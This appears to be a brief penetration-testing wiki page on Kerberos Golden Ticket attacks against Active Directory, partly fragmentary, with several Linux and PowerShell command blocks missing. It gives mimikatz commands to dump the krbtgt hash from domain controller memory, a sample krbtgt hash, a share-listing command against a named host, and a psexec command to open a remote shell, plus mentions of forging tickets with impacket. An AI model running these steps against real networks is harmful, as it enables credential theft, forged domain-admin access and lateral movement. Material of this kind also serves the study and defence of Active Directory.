π₯Golden Ticket Attacks

Here we have the hash for kerberos ticket granting ticket with which we can gernerate ktgt.
Run mimikatz and
privilege::debug
lsadump::lsa /inject /name:krbtgtand copy these 2 into notepad for later use

user can be anything
rid is 500 for admin
ptt means pass the ticket

We can access other computers on network
dir \\THEPUNISHER\c$

psexec.exe \\THEPUNISHER cmd.exeto get a shell
Linux
Since we have the krbtgt we can do a golden ticket attack:
krbtgt:819af826bb148e603acb0f33d17632f8We need domain-sid so using powersploit: Powershell:
Linux:
Now using this info with impacket ticketer to get the golden ticket:
Putting the ticket in our environment variable:
Note: before psexec check if dns and time is configured properly
Last updated
Was this helpful?